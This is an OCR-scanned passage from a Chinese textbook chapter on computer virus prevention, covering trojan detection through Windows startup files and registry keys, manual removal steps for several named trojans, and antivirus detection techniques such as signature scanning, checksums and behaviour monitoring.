选中 “Systemini” 标 签 ， 展 开 [bootl 目录 ， 查 看 “shel=” 这 行 ， 正 常 为 
“shell=Explorer.exe” ， 如 果 不 是 这 样 ， 就 可 能 中 木马 了 。 

2) 查看 win.ini 文件 

选中 win.ini 标签 ， 展 开 [windows] 目 录 项 ， 查 看 “run=” 和 “1load=” 行 ， 等 号 后 面 正 
常 应 该 为 空 。 

3) 查看 启动 组 

再 看 看 启动 标签 中 的 启动 项 目 有 没有 非 正常 项 目 ， 要 是 有 类 似 netbus、netspy、bo 等 
关键 词 ， 极 有 可 能 中 了 木马 。 

4) 查看 注册 表 

选择 “开始 ”一 “运行 ”菜单 命令 ， 在 打开 的 “运行 ”对 话 框 中 输入 regedit， 单 击 
【确定 】 按 钮 就 可 以 运行 注册 表 编 辑 器 。 再 展开 至 “HKEY-LOCAL-MACHINESoftware 
MicrosoftWindowsCurrentVersionRun ”目录 下 ， 查 看 键 值 中 有 没有 自己 不 熟悉 的 自动 启动 
文件 项 目 ， 如 netbus、netspy、netserver 等 的 关键 词 。 

注意 ， 有 的 木马 程序 生成 的 服务 器 程序 文件 很 像 系统 自身 的 文件 ， 想 由 此 伪装 蒙混 过 
关 。 比 如 Acid Battery 木马 会 在 注册 表 项 “HKEY-LOCAL-MACHINESOFTWAREMicrosoft 
WindowsCurrentVersionRun ”下 加 入 Explorer=“CWINDOWSexpiorer.exe”， 木 马 服 务 器 
程序 与 系统 自身 的 真正 的 Explorer 之 间 只 有 一 个 字母 的 差别 ! 

通过 类 似 的 方法 对 下 列 各 个 主键 下 面 的 键 值 进行 检查 : 

HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 

HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx 

HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\RunSservices 


HKEY-LOCAL- 
MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 


但 


区 


如 果 操 作 系统 是 Windows NT， 还 得 注意 HKEY-LOCAL-MACHINE\Software\SAM 下 
面 的 内 容 ， 如 果 有 项 目 ， 极 有 可 能 就 是 木马 了 。 正 常情 况 下 ， 该 主键 下 面 是 空 的 。 

当然 在 注册 表 中 还 有 很 多 地 方 都 可 以 隐藏 木马 程序 ， 上 面 这 些 主键 是 木马 比较 常用 的 隐身 
之 处 。 此 外 ， 像 HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run、 
HKEY-USERS\****\Software、Microsoft\Windows\CurrentVersion\Run 的 目录 下 都 有 可 能 成 为 木 
马 的 藏身 之 处 。 最 好 的 办 法 就 是 在 HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\ 


.1 人 \， 


第 8 章 ， 计 算 机 病毒 防治 技术 到 「 疾 


CurrentVersion\Run 或 其 他 主键 下 面 找到 木马 程序 的 文件 名 ， 再 通过 其 文件 名 对 整个 注册 表 
进行 全 面 搜索 就 知道 它 有 几 个 藏身 的 地 方 了 。 

如 果 有 留意 ， 注 册 表 各 个 主键 下 都 会 有 个 叫 “( 默 认 )” 名 称 的 注册 项 ， 而 且 数据 显示 
为 “(未 设置 键 值 )”， 也 就 是 空 的 ， 这 是 正常 现象 。 如 果 发 现 这 个 默认 项 被 替换 了 ， 那 么 
蔡 换 它 的 就 是 木马 了 。 

5) 其 他 方法 

上 网 过 程 中 ， 在 进行 一 些 计算 机 正常 使 用 操作 时 ， 发 现 计算 机 速度 明显 起 了 变化 、 硬 
盘 在 不 停 的 读 写 、 鼠 标 不 听 使 唤 、 键 盘 无 效 、 自 己 的 一 些 窗口 在 未 得 到 自己 允许 的 情况 下 
被 关闭 、 新 的 窗口 被 莫名 其 妙 地 打开 ……' 这 一 切 的 不 正常 现象 都 可 能 是 木马 客户 端 在 远程 
控制 计算 机 。 

4. 木马 病毒 的 删除 


首先 要 将 网 络 断 开 ， 以 排除 来 自 网 络 的 影响 ， 再 选择 相应 的 方法 来 删除 它 。 

1) 通过 木马 的 客户 端 程序 删除 

根据 前 面 在 win.ini、system.ini 和 注册 表 中 查找 到 的 可 疑 文件 名 判断 木马 的 名 字 和 版 
本 ， 如 “netbus”“netspy” 等 ， 对 应 的 木马 就 是 NETBUS 和 NETSPY。 从 网 上 找到 其 相 
应 的 客户 端 程序 ， 下 载 并 运行 该 程序 ， 在 客户 程序 对 应 位 置 填 入 本 地 计算 机 地 址 127.0.0.1 
和 端口 号 ， 就 可 以 与 木马 程序 建立 连接 。 再 由 客户 端的 卸 除 木 马 服务 器 的 功能 来 卸 除 木 
马 。 端 口号 可 由 “netstat -a” 命 令 查 出 来 。 

这 种 方法 清除 木马 最 容易 ， 相 对 来 说 也 比较 彻底 。 但 还 存在 一 些 弊端 ， 如 果木 马 文件 
名 给 另外 改 了 名 字 ， 就 无 法 通过 这 些 特征 来 判断 到 底 是 什么 木马 了 。 如 果木 马 被 设置 了 密 
码 ， 即 使 客户 端 程序 可 以 连接 上 ， 没 有 密码 也 登录 不 进 本 地 计算 机 。 另 外 ， 如 果 该 木马 的 
客户 端 程序 没有 提供 印 载 木马 的 功能 ， 那 么 该 方法 就 无 效 了 。 

2) 手工 删除 

如 果 不 知 道中 的 是 什么 木马 、 无 登录 的 密码 、 找 不 到 其 相应 的 客户 端 程序 等 ， 那 就 只 
能 手工 删除 木马 了 。 
有 msconfig 打开 系统 配置 实用 程序 ， 对 win.ini、system.ini 和 启动 项 目 进行 编辑 。 屏 
蔽 掉 非法 启动 项 。 如 在 win.ini 文件 中 ， 将 [WINDOWS] 下 面 的 “run=xxx” 或 “load=xxx” 
更 改 为 “rn=” 和 “load=”; 编辑 system.ini 文件 ， 将 [BOOT] 下 面 的 “shell=xxx” 更 改 
为 “shell=Explorer.exe”。 

用 regedit 打开 注册 表 编 辑 器 ， 对 注册 表 进 行 编 辑 。 先 由 上 面 的 方法 找到 木马 的 程序 
名 ， 再 在 整个 注册 表 中 搜索 ， 并 删除 所 有 木马 项 目 。 由 查找 到 的 木马 程序 注册 项 ， 分 析 木 
马 文 件 在 硬盘 中 的 位 置 。 启 动 到 纯 MS-DOS 状态 (而 不 是 在 Windows 环境 中 开 个 MS-DOS 
窗口 )， 用 del 命令 将 木马 文件 删除 。 如 果木 马 文件 是 系统 、 隐 藏 或 只 读 文 件 ， 还 得 通过 
“attrib -s -h -r” 将 对 应 文件 的 属性 改变 才 可 以 删除 。 
为 保险 起 见 ， 重 新 启动 以 后 再 由 上 面 各 种 检测 木马 的 方法 对 系统 进行 检查 ， 以 确保 木 
马 的 确 被 删除 了 。 

目前 也 有 一 些 木马 是 将 自身 的 程序 与 Windows 的 系统 程序 进行 了 绑 定 (也 就 是 感染 了 
系统 文件 )。 比 如 常用 到 的 Explorerexe， 只 要 Explorer.exe 一 得 到 运行 ， 木 马 也 就 启动 
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了 。 这 种 木马 可 以 感染 可 执行 文件 。 由 手工 删除 文件 的 方法 处 理 木 马 后 ， 一 运行 
Explorer.exe， 木 马 又 得 以 复生 ! 这 时 要 删除 木马 就 得 连 Explorer.exe 文件 一 起 删除 掉 ， 再 
从 其 他 相同 操作 系统 版 本 的 计算 机 中 将 该 文件 复制 过 来 。 


5. 木马 病毒 实例 


Intemet 上 每 天 都 有 新 的 木马 出 现 ， 所 采取 的 隐蔽 措施 也 是 五 花 八 门 。 下 面 介绍 几 种 常 
见 的 木马 病毒 的 清除 方法 。 

1) trojan.agent 病毒 的 清除 

清除 trojan.agent 病毒 可 在 安全 模式 下 进行 以 下 处 理 。 

(1) 重启 计算 机 进入 安全 模式 。 

(2) 打开 “控制 面板 ”的 “添加 删除 程序 ”， 找 到 windirected2.0 并 印 载 。 

(3) 在 安全 模式 下 ， 打 开 “ 控 制 面板 ”的 Intermet 选项 ， 单 击 “删除 文件 ”按钮 ， 打 开 
删除 文件 对 话 框 ， 选 中 “删除 所 有 脱 机 内 容 ” 复 选 框 。 

(4) 在 安全 模式 下 删除 以 下 文件 夹 ; 

C:\Windows\System32\mscache 

C:\Windows\System32\msicn 

(5) 重启 计算 机 到 正常 模式 ， 再 用 杀毒 程序 全 盘 扫 描 。 

2) Trojan.PSW.Agent.any 病毒 的 清除 

Trojan.PSW.Agent.any 病毒 会 自动 将 用 户 的 正 主页 锁定 为 一 个 名 叫 “9505 上 网 导航 ” 
的 网 站 ， 并 会 自动 从 网 上 下 载 新 的 变种 病毒 。 该 病毒 运行 后 会 将 自身 复制 到 系统 文件 目录 
中 ， 文 件 名 为 “msprt.dl”， 同 时 将 自身 复制 到 QQ 软件 安装 目录 下 。 并 从 互联 网 上 下 载 
染 毒 的 Riched32.dll 文件 覆盖 原 有 文件 ， 使 用 户 启 动 QQ 时 自动 运行 病毒 。 该 病毒 还 会 修 
改 系统 配置 文件 ， 使 用 户 访问 其 他 网 站 时 自动 跳 转 到 “9505 上 网 导航 ”网 站 。 

可 以 采取 以 下 措施 预防 和 清除 Trojan.PSW.Agentany 病毒 。 

(1) 升级 杀毒 软件 到 最 新 版 本 ， 同 时 开启 实时 监控 程序 ， 防 止 病毒 侵入 。 

(2) 在 个 人 防火 墙 的 网 站 访问 控制 黑 名 单 中 加 入 “www.9505.com” 地 址 ， 并 开启 家 长 
保护 功能 ， 阻 断 病毒 的 升级 途径 。 

(3) 如 果 发 现 正 浏览 器 的 首页 被 莫名 其 妙 地 设置 为 “9505 上 网 导航 ”网 站 ， 应 立即 使 
用 杀毒 软件 查 毒 。 

3) Trojan.Dropper 病毒 的 清除 

Trojan.Dropper 木马 捆绑 和 伪装 工具 ， 可 以 把 木马 捆绑 到 其 他 文件 上 。 

如 果 同时 按 Cl 十 Alt 十 Del 组 合 键 打开 “Windows 任务 管理 器 ”窗口 ， 单 击 进程 ， 发 现 以 
下 进程 : hmisvc32.exe 、emailexe 、oiexe、 ctsvccd.exe 、adservice.exe 、Imsmonk32.exe 、 
gesfm32.exe， 则 该 计算 机 可 能 已 经 感染 了 W32.randex2、W32.spybot 脚本 间谍 蠕虫 病毒 、 
Trojan.dropper 点 滴 木 马 等 病毒 。 可 用 以 下 方法 解决 。 

(1) 关闭 系统 还 原 的 功能 (windows Me/xp)。 

(2) 连 上 网 络 更 新 病毒 定义 库 。 

(3) 更 新 完 后 重新 开机 ( 按 F8 键 )， 并 且 开 机 到 安全 模式 或 者 VGA 模式 。 

(4) 执行 全 系统 的 扫描 ， 并 且 删 除 侦 测 到 感染 病毒 的 所 有 档案 。 
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(5) 删除 被 病毒 自行 增加 到 登录 文件 的 登录 值 。 


8.3” 反 病毒 技术 


网 络 反 病 毒 技 术 包 括 预防 病毒 、 检 测 病 毒 和 杀毒 等 3 种 技术 。 

(1) 预防 病毒 技术 ， 它 通过 自身 常 驻 系统 内 存 ， 优 先 获得 系统 的 控制 权 ， 监 视 和 判断 
系统 中 是 否 有 病毒 存在 ， 进 而 阻止 计算 机 病毒 进入 计算 机 系统 和 对 系统 进行 破坏 。 

(2) 检测 病毒 技术 ， 它 是 通过 病毒 的 特征 来 判断 病毒 行为 、 类 型 等 的 技术 。 

(3) 杀毒 技术 。 它 通过 对 计算 机 病毒 的 分 析 ， 开 发 出 具有 删除 病毒 程序 并 恢复 原文 件 
的 软件 。 

病毒 的 繁衍 方式 、 传 播 方式 不 断 变化 ， 反 病毒 技术 也 应 该 在 与 病毒 对 抗 的 同时 不 断 推 
陈 出 新 。“ 预防 为 主 ， 治 疗 为 辅 ” 这 一 方针 也 完全 适用 于 计算 机 病毒 的 处 理 。 


8.3.1 预防 病毒 技术 


防治 感染 病毒 主要 有 两 种 手段 : 一 是 用 户 遵守 和 加 强 安全 操作 控制 措施 ， 在 思想 上 要 
重视 病毒 可 能 造成 的 危害 ， 二 是 在 安全 操作 的 基础 上 ， 使 用 硬件 和 软件 防 病毒 工具 ， 利 用 
网 络 的 优势 ， 把 防 病毒 纳入 到 网 络 安全 体系 之 中 ， 形 成 一 套 完 整 的 安全 机 制 ， 使 病毒 无 法 
逾越 计算 机 安全 保护 的 屏障 ， 病 毒 便 无 法 广泛 传播 。 实 践 证 明 ， 通 过 这 些 防 护 措施 和 手 
段 ， 可 以 有 效 地 降低 计算 机 系统 被 病毒 感染 的 概率 ， 保 障 系统 的 安全 稳定 运行 。 


1. 病毒 预防 


对 病毒 的 预防 在 病毒 防治 工作 中 起 主导 作用 。 病 毒 预防 是 一 个 主动 的 过 程 ， 不 是 针对 
某 一 种 病毒 ， 而 是 针对 病毒 可 能 入 侵 的 系统 薄弱 环节 加 以 保护 和 监控 。 而 病毒 治疗 属于 一 
个 被 动 的 过 程 ， 只 有 在 发 现 一 种 病毒 进行 研究 以 后 ， 才 可 以 找到 相应 的 治疗 方法 ， 这 也 是 
杀毒 软件 总 是 落后 于 病毒 软件 的 原因 。 所 以 ， 病 毒 的 防治 重点 应 放 在 预防 上 。 当 使 用 一 种 
能 查 能 杀 的 抗 病 毒 软件 时 ， 最 好 是 先 查 毒 ， 找 到 了 带 毒 文件 后 ， 再 确定 是 否 进行 杀毒 操 
作 。 因 为 查 毒 不 是 危险 操作 ， 它 可 能 产生 误 报 ， 但 绝 不 会 对 系统 造成 任何 损坏 ;而 杀毒 是 
危险 操作 ， 有 可 能 破坏 程序 。 

2. 网 络 病毒 的 防治 

1) 基于 工作 站 的 防治 方法 

工作 站 是 网 络 的 门 ， 只 要 将 这 扇 门 关 好 ， 就 能 有 效 地 防止 病毒 的 入 侵 。 单 机 反 病 毒手 
段 ， 如 单机 反 病 毒 软 件 、 防 病毒 卡 等 同样 可 保护 工作 站 的 内 存 和 硬盘 ， 因 而 这 些 手 段 在 网 
络 反 病毒 大 战 中 仍然 大 有 用 武之 地 ， 在 一 定 程度 上 可 以 有 效 阻止 病毒 在 网 络 中 的 传播 。 

2) 基于 服务 器 的 防治 方法 

服务 器 是 网 络 的 核心 ， 一 旦 服务 器 被 病毒 感染 ， 就 会 使 整个 网 络 陷于 瘫痪 。 目 前 ， 基 
于 服务 器 的 防治 病毒 方法 大 都 采用 以 NLMQNetware Loadable Module) 可 装载 模块 技术 进行 
程序 设计 ， 以 服务 器 为 基础 ， 提 供 实时 扫描 病毒 能 力 。 病 毒 的 入 侵 必 将 对 系统 资源 构成 威 
， 即 使 是 良性 病毒 也 要 侵吞 系统 的 宝贵 资源 ， 因 此 防治 病毒 入 侵 要 比 病毒 入 侵 后 再 加 以 
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清除 重要 得 多 。 抗 病毒 技术 必须 建立 “预防 为 主 ， 消 灭 结合 ”的 基本 观念 。 
8.3.2 ”检测 病毒 技术 


要 判断 一 个 计算 机 系统 是 否 感染 病毒 ， 首 先 要 进行 病毒 检测 ， 检 测 到 病毒 的 存在 后 才 
能 对 病毒 进行 消除 和 预防 ， 所 以 病毒 的 检测 是 至 关 重 要 的 。 通 过 检测 及 早 发 现 病毒 ， 并 及 
时 进行 处 理 ， 可 以 有 效 地 抑制 病毒 的 草 延 ， 尽 可 能 地 减少 损失 。 

检测 计算 机 上 是 否 被 病毒 感染 ， 通 常 可 以 分 两 种 方法 ， 即 手工 检测 和 自动 检测 。 

(1) 手工 检测 是 指 通过 一 些 工具 软件 ， 如 Debug.com 、Pctools.exe 、Nu.com 和 
Sysinfo.exe 等 进行 病毒 的 检测 。 其 基本 过 程 是 利用 这 些 工 具 软 件 ， 对 易 遭 病毒 攻击 和 修改 
的 内 存 及 磁盘 的 相关 部 分 进行 检测 ， 通 过 与 正常 情况 下 的 状态 进行 对 比 来 判断 是 否 被 病毒 
感染 。 这 种 方法 要 求 检测 者 熟悉 计算 机 指令 和 操作 系统 ， 操 作 比 较 复 杂 ， 容 易 出 错 且 效 率 
较 低 ， 适 合计 算 机 专业 人 员 使 用 ， 因 而 无 法 普及 。 但 是 ， 使 用 该 方法 可 以 检测 和 识别 未 知 
的 病毒 ， 以 及 检测 一 些 自动 检测 工具 不 能 识别 的 新 病毒 。 

(2) 自动 检测 是 指 通过 一 些 诊断 软件 和 杀毒 软件 ， 来 判断 一 个 系统 或 磁盘 是 和 否 有 毒 ， 
如 使 用 瑞星 、 金 山 毒霸 、 江 民 杀 毒 软件 等 。 该 方法 可 以 方便 地 检测 大 量 病毒 ， 且 操作 简 
单 ， 一 般 用 户 都 可 以 进行 。 但 是 ， 自 动 检测 工具 只 能 识别 已 知 的 病毒 ， 而 且 它 的 发 展 总 是 
滞后 于 病毒 的 发 展 ， 所 以 自动 检测 工具 总 是 对 相当 数量 的 病毒 不 能 识别 。 

对 病毒 进行 检测 可 以 采用 手工 方法 和 自动 方法 相 结合 的 方式 。 检 测 病毒 的 技术 和 方法 
主要 有 以 下 几 种 。 

1. 比较 法 

比较 法 是 将 原始 备份 与 被 检测 的 引导 扇 区 或 被 检测 的 文件 进行 比较 。 比 较 时 可 以 利用 
打印 的 代码 清单 (如 Debug 的 D 命令 输出 格式 ) 进 行 比较 ， 或 用 程序 来 进行 比较 (如 DOS 的 
DISKCOMP、FC 或 PCTOOLS 等 其 他 软件 )。 这 种 比较 法 不 需要 专门 的 查 计算 机 病毒 程 
序 ， 只 要 用 常规 DOS 软件 和 PCTOOLS 等 工具 软件 就 可 以 进行 。 

比较 法 的 优点 是 简单 、 方 便 ， 不 需要 专用 软件 。 缺 点 是 无 法 确认 计算 机 病毒 的 种 类 和 
名 称 。 另 外 ， 造 成 被 检测 程序 与 原始 备份 之 间 差 别 的 原因 尚 需 进一步 验证 ， 以 查 明 是 由 于 
计算 机 病毒 造成 的 ， 还 是 由 于 DOS 数据 被 偶然 原因 ， 如 突然 停电 、 程 序 失控 、 恶 意 程序 
等 破坏 的 。 此 外 ， 当 找 不 到 原始 备份 时 ， 用 比较 法 也 不 能 马上 得 到 结论 。 因 此 ， 制 作 和 保 
留 原 始 主 引导 扇 区 和 其 他 数据 备份 是 至 关 重 要 的 。 

2. 特征 代码 法 

特征 代码 法 是 用 每 一 种 计算 机 病毒 体 含有 的 特定 字符 串 对 被 检测 的 对 象 进行 扫描 。 如 
果 在 被 检测 对 象 内 部 发 现 了 某 一 种 特定 字 节 串 ， 就 表明 发 现 了 该 字符 串 所 代表 的 计算 机 病 
毒 ， 这 种 计算 机 病毒 扫描 软件 称 为 Virus Scanner。 

计算 机 病毒 扫描 软件 由 两 部 分 组 成 : 一 部 分 是 计算 机 病毒 代码 库 ， 含 有 经 过 特别 选 定 
的 各 种 计算 机 病毒 的 代码 串 ， 另 一 部 分 是 利用 该 代码 库 进行 扫描 的 扫描 程序 ， 目 前 常见 的 
对 已 知 计算 机 病毒 进行 检测 的 软件 大 多 采用 这 种 方法 。 计 算 机 病毒 扫描 程序 能 识别 的 计算 
机 病毒 的 数目 完全 取决 于 病毒 代码 库 内 所 含 病毒 的 种 类 多 少 。 显 然 ， 库 中 病毒 代码 种 类 越 


[216. 


诊 


第 8 章 计算 机 病毒 防治 技术 倒 国 
多 ， 扫 描 程序 能 认 出 的 计算 机 病毒 就 越 多 。 


计算 机 病毒 代码 串 的 选择 是 非常 重要 的 。 如 果 随 意 从 计算 机 病毒 体内 选 一 段 作 为 代表 
该 计算 机 病毒 的 特征 代码 串 ， 由 于 在 不 同 的 环境 中 ， 该 特征 串 可 能 并 不 真正 具有 代表 性 ， 
因而 ， 选 这 种 串 作 为 计算 机 病毒 代码 库 的 特征 串 是 不 合适 的 。 

另 一 种 情况 是 ， 代 码 串 不 应 含有 计算 机 病毒 的 数据 区 ， 因 为 数据 区 是 会 经 常 变化 的 。 
代码 串 一 定 要 在 仔细 分 析 程序 之 后 选 出 最 具 代 表 特 性 的 ， 足 以 将 该 计算 机 病毒 区 别 于 其 他 
计算 机 病毒 的 字 节 串 。 一 般 情 况 下 ， 代 码 串 由 连续 的 若干 个 字 节 组 成 ， 但 是 有 些 扫描 软件 
采用 的 是 可 变 长 串 ， 即 在 串 中 包含 一 个 到 几 个 模糊 字 节 。 扫 描 软件 遇 到 这 种 串 时 ， 只 要 除 
模糊 字 节 之 外 的 字符 串 都 能 完全 匹配 ， 就 能 判别 出 计算 机 病毒 。 
除了 前 面 提 到 的 特征 串 的 规则 外 ， 最 重要 的 一 条 是 特征 串 必 须 能 将 计算 机 病毒 与 正常 
的 非 计 算 机 病毒 程序 区 分 开 。 如 果 将 非 计 算 机 病毒 程序 当成 计算 机 病毒 报告 给 用 户 ， 是 假 
警报 ， 就 会 使 用 户 放 松 警惕 ， 若 真 的 计算 机 病毒 一 来 ， 破 坏 就 严重 了 ， 而 且 ， 若 将 假 警报 
送 给 防 杀 计算 机 病毒 的 程序 ， 会 将 正常 程序 “ 杀 死 ”。 

采用 病毒 特征 代码 法 的 检测 工具 ， 面 对 不 断 出 现 的 新 病毒 ， 必 须 不 断 更 新 版 本 ;否则 
检测 工具 会 老化 ， 逐 渐 失去 实用 价值 。 病 毒 特征 代码 法 无 法 检测 新 出 现 的 病毒 。 

特征 代码 法 的 实现 步骤 如 下 。 

(1) 采集 已 知 病毒 样本 ， 如 果 病 毒 既 感染 .COM 文件 又 感染 .EXE 文件 ， 则 要 同时 采集 
COM 型 病毒 样本 和 EXE 型 病毒 样本 。 

(2) 在 病毒 样本 中 抽取 特征 代码 ， 抽 取 的 代码 必须 比较 特殊 ， 不 大 可 能 与 普通 正常 程 
序 代码 吻合 。 抽 取 的 代码 要 有 适当 长 度 ， 一 方面 维持 特征 代码 的 唯一 性 ， 在 保持 唯一 性 的 
前 提 下 ， 尽 量 使 特征 代码 长 度 短 些 ， 以 减少 空间 与 时 间 开 销 。 在 既 感染 .COM 文件 又 感 
染 .EXE 文件 的 病毒 样本 中 ， 要 抽取 两 种 样本 共有 的 代码 ， 并 将 特征 代码 纳入 病毒 数据 库 。 

(3) 打开 被 检测 文件 ， 在 文件 中 搜索 ， 检 查 文件 中 是 否 含有 病毒 数据 库 中 的 病毒 特征 
代码 。 如 果 发 现 与 病毒 特征 代码 完全 匹配 的 字符 串 ， 便 可 以 断定 被 查 文件 感染 何 种 病毒 。 

特征 代码 法 的 优点 是 检测 准确 快速 、 可 识别 病毒 的 名 称 、 误 报警 率 低 以 及 依据 检测 结 
果 可 做 解毒 处 理 。 

特征 代码 法 的 缺点 是 不 能 检测 未 知 病毒 ， 且 搜集 已 知 病毒 的 特征 代码 费用 开销 大 ， 在 
网 络 上 效率 低 。 


3. 分 析 法 


分 析 法 是 预防 和 查 杀 计算 机 病毒 不 可 缺少 的 重要 技术 ， 任 何 一 个 性 能 优良 的 预防 和 查 杀 
计算 机 病毒 系统 的 研制 和 开发 都 离 不 开 专门 人 员 对 各 种 计算 机 病毒 的 详尽 而 准确 的 分 析 。 

4. 校 验 和 法 

计算 正常 文件 的 校 验 和 ， 并 将 结果 写 入 此 文件 或 其 他 文件 中 保存 。 在 文件 使 用 过 程 中 
或 使 用 之 前 ， 定 期 检查 文件 的 校 验 和 与 原来 保存 的 校 验 和 是 否 一 致 ， 从 而 可 以 发 现 文件 是 
否 被 感染 ， 这 种 方法 称 为 校 验 和 法 。 在 SCAN 和 CPAYV 工具 的 后 期 版 本 中 除了 病毒 特征 代 
码 法 之 外 ， 还 纳入 校 验 和 法 ， 以 提高 其 检测 能 力 

校 验 和 法 的 优点 是 方法 简单 ， 能 发 现 未 知 病毒 ， 也 能 发 现 被 查 文件 的 细微 变化 。 缺 点 
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是 会 误 报警 ， 不 能 识别 病毒 名 称 ， 不 能 对 付 隐 蔽 型 病毒 。 

5. 行为 监测 法 

利用 病毒 的 特有 行为 特征 性 来 监测 病毒 的 方法 ， 称 为 行为 监测 法 。 病 毒 具 有 某 些 共同 
行为 ， 而 且 这 些 行为 比较 特殊 。 在 正常 程序 中 ， 这 些 行为 比较 罕见 。 当 程序 运行 时 ， 监 视 
其 行为 ， 如 果 发 现 病毒 行为 ， 立 即 报警 。 行 为 监测 法 的 优点 是 可 发 现 未 知 病毒 ， 能 够 相当 
准确 地 预报 未 知 的 多 数 病毒 。 

6. 软件 仿真 扫描 法 


该 技术 专门 用 于 对 付 多 态 性 计算 机 病毒 。 多 态 性 计算 机 病毒 在 每 次 传染 时 ， 都 将 自身 
以 不 同 的 随机 数 加 密 于 每 个 感染 的 文件 中 ， 传 统 的 特征 代码 法 根本 无 法 找到 这 种 计算 机 病 
毒 。 因 为 多 态 性 病毒 代码 实施 密码 化 ， 而 且 每 次 所 用 密 钥 不 同 ， 即 使 把 染 毒 的 病毒 代码 相 
互 比较 ， 也 无 法 找 出 相同 的 可 能 作为 特征 的 稳定 代码 。 虽 然 行为 监测 法 可 以 检测 多 态 性 病 
毒 ， 但 是 在 检测 出 病毒 后 ， 因 为 不 能 判断 病毒 的 种 类 ， 所 以 难以 做 进一步 处 理 。 软 件 仿真 
技术 则 能 成 功 地 仿真 CPU 执行 ， 在 DOS 虚拟 机 下 伪 执 行 计算 机 病毒 程序 ， 安 全 地 将 其 解 
密 ， 然 后 再 进行 扫描 。 


7. 先知 扫描 法 


先知 扫描 技术 是 继 软件 仿真 后 的 又 一 大 技术 突破 。 既 然 软 件 仿真 可 以 建立 一 个 保护 模 
式 下 的 DOS 虚拟 机 ， 仿 真 CPU 动作 并 伪 执 行程 序 以 解 开 多 态 变 形 计算 机 病毒 ， 那 么 应 用 
类 似 的 技术 也 可 以 用 于 分 析 一 般 程序 ， 检 查 可 疑 的 计算 机 病毒 代码 。 先 知 扫 描 技术 就 是 将 
专业 人 员 用 来 判断 程序 是 否 存在 计算 机 病毒 代码 的 方法 ， 分 析 归 纳 成 专家 系统 和 知识 库 ， 
再 利用 软件 仿真 技术 伪 执 行 新 的 计算 机 病毒 ， 超 前 分 析出 新 计算 机 病毒 代码 ， 用 于 对 付 以 
后 的 计算 机 病毒 。 


8. 人 工 智能 陷阱 技术 和 宏 病 毒 陷阱 技术 


人 工 智 能 陷阱 是 一 种 监测 计算 机 行为 的 常 驻 式 扫描 技术 。 它 将 所 有 计算 机 病毒 所 产生 
的 行为 归纳 起 来 ， 一 旦 发 现 内 存 中 的 程序 有 任何 不 当 的 行为 ， 系 统 就 会 有 所 警觉 ， 并 告知 
使 用 者 。 这 种 技术 的 优点 是 执行 速度 快 、 操 作 简便 ， 且 可 以 检测 到 各 种 计算 机 病毒 ， 其 缺 
点 是 程序 设计 难度 大 ， 且 不 容易 考虑 周全 。 在 这 千变万化 的 计算 机 病毒 世界 中 ， 人 工 智能 
陷阱 扫描 技术 是 具有 主动 保护 功能 的 新 技术 。 

宏 病 毒 陷阱 技术 则 是 结合 了 特征 代码 法 和 人 工 智能 陷阱 技术 ， 根 据 行为 模式 来 检测 已 
知 及 未 知 的 宏 病 毒 。 其 中 ， 配 合 OLE2 技术 ， 可 将 宏 与 文件 分 开 ， 使 得 扫描 速度 加 快 ， 而 
且 能 更 有 效 地 彻底 清除 宏 病毒 。 


9. 实时 IO 扫描 


实时 IO 扫描 的 目的 在 于 即时 对 计算 机 上 的 输入 输出 数据 作 病 毒 码 比 对 ， 和 希望 能 够 在 
病毒 尚未 被 执行 之 前 ， 将 病毒 防御 于 门 外 。 理 论 上 ， 这 样 的 实时 扫描 技术 会 影响 到 数据 的 
输入 输出 速度 。 其 实 不 然 ， 在 文件 输入 之 后 ， 就 等 于 扫 过 一 次 毒 了 。 如 果 扫 描 速度 能 够 提 
高 很 多 ， 这 种 方法 确实 能 对 数据 起 到 很 好 的 保护 作用 。 


(2. 
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10. 网 络 病毒 检测 技术 


随 着 Intemet 在 全 世界 的 广泛 普及 ， 网 络 已 成 为 病毒 传播 的 新 途径 ， 网 络 病毒 也 成 为 
四 客 对 用 户 或 系统 进行 攻击 的 有 效 工 具 ， 所 以 有 效 地 检测 网 络 病毒 已 经 成 为 病毒 检测 的 最 
要 部 分 。 

网 络 监 测 法 是 一 种 检查 、 发 现 网 络 病毒 的 方法 。 根 据 网 络 病毒 主要 通过 网 络 传播 的 特 
点 ， 感 染 网 络 病毒 的 计算 机 一 般 会 发 送 大 量 的 数据 包 ， 产 生 突 发 的 网 络 流量 ， 有 的 还 开放 
固定 的 TCP/IP 端口 。 用 户 可 以 通过 流量 监视 、 端 口 扫 描 和 网 络 监听 来 发 现 病毒 ， 这 种 方 
法 对 查找 局 域 网 内 感染 网 络 病毒 的 计算 机 比较 有 效 。 

1) ActiveX 和 Java 携带 的 病毒 

大 量 网 页 中 含有 ActiveX 控件 和 Java 小 程序 (Applet)， 它 们 在 给 网 页 带 来 动画 和 立体 
感 效 果 的 同时 ， 也 使 上 网 的 企业 和 个 人 用 户 面临 新 的 不 安全 因素 。 

由 于 内 存 和 带宽 的 限制 ， 用 户 下 载 网 页 中 的 ActiveX 控件 和 Java 小 程序 可 通过 对 本 地 
硬盘 的 访问 来 获得 大 量 本 地 程序 的 控制 权限 ， 以 节约 内 存 和 带宽 。 恶 意 代 码 开发 者 正 是 利用 
这 个 漏洞 ， 制 造 出 恶意 的 ActiveX 控件 和 Java 程序 嵌入 在 Web 主页 ， 当 用 户 浏览 这 些 主页 
时 ， 病 毒 便 驻 留 到 用 户 的 计算 机 中 ， 进 行 偷窥 、 删 除 或 毁坏 文件 ， 以 及 其 他 一 些 恶意 活动 。 

在 上 面 提 到 的 两 种 新 的 病毒 携带 者 中 ，ActiveX 更 具 和 危害 性 ， 尤 其 是 它 的 早期 版 本 
OLE( 对 象 链接 和 嵌入 )。ActiveX 能 直接 调用 任何 Windows 系统 函数 ，ActiveX 组 件 是 指 一 
些 可 执行 的 代码 如 .exe 和 .dll 文件 等 。ActiveX 主要 运行 于 正 浏览 器 之 上 ， 但 在 Netscape 
浏览 器 上 通过 插件 也 能 运行 ActiveX。 

Java 小 程序 通常 存放 在 服务 器 端 ， 由 浏览 器 下 载 到 用 户主 机 ，Java 小 程序 的 代码 通过 
Java 虚拟 机 在 用 户主 机 上 运行 。 由 于 Java 虚拟 机 运行 的 跨 平 台 特 点 ，Java 小 程序 在 用 户主 
